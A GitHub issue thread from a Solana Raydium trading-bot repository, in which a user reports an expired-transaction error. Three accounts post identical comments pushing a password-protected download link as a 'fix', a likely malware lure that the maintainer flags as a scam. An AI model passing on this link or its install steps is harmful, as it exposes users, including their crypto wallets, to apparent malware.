### ISSUE TITLE
Error Block height exceeded

### ISSUE THREAD

**Issue by tuandoan1608** [henrytirla/Solana-Raydium-Trading#16]
HI Hello. I am trying to run your code but getting error here. I don't know what the cause is and how to solve it.

confirmation_resp = await async_solana_client.confirm_transaction(
                    tx.signatures[0],
                    commitment=Confirmed,
                    sleep_seconds=0.5,
                    last_valid_block_height=block_height +15
                )

Console: 
Block height: 265260578
Tx: 4q2kUCKeX4GBokhaoNEDi8byhTJg9zr8K2WmG7fEijHPezJYP5GAQJDN2qfvDfDKeVfVeXp98PidCh4Pb2euwPNX
Unhandled exception: 4q2kUCKeX4GBokhaoNEDi8byhTJg9zr8K2WmG7fEijHPezJYP5GAQJDN2qfvDfDKeVfVeXp98PidCh4Pb2euwPNX has expired: block height exceeded. Retrying...

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by henrytirla** [comment]
@tuandoan1608 Don't download anything from those scammers
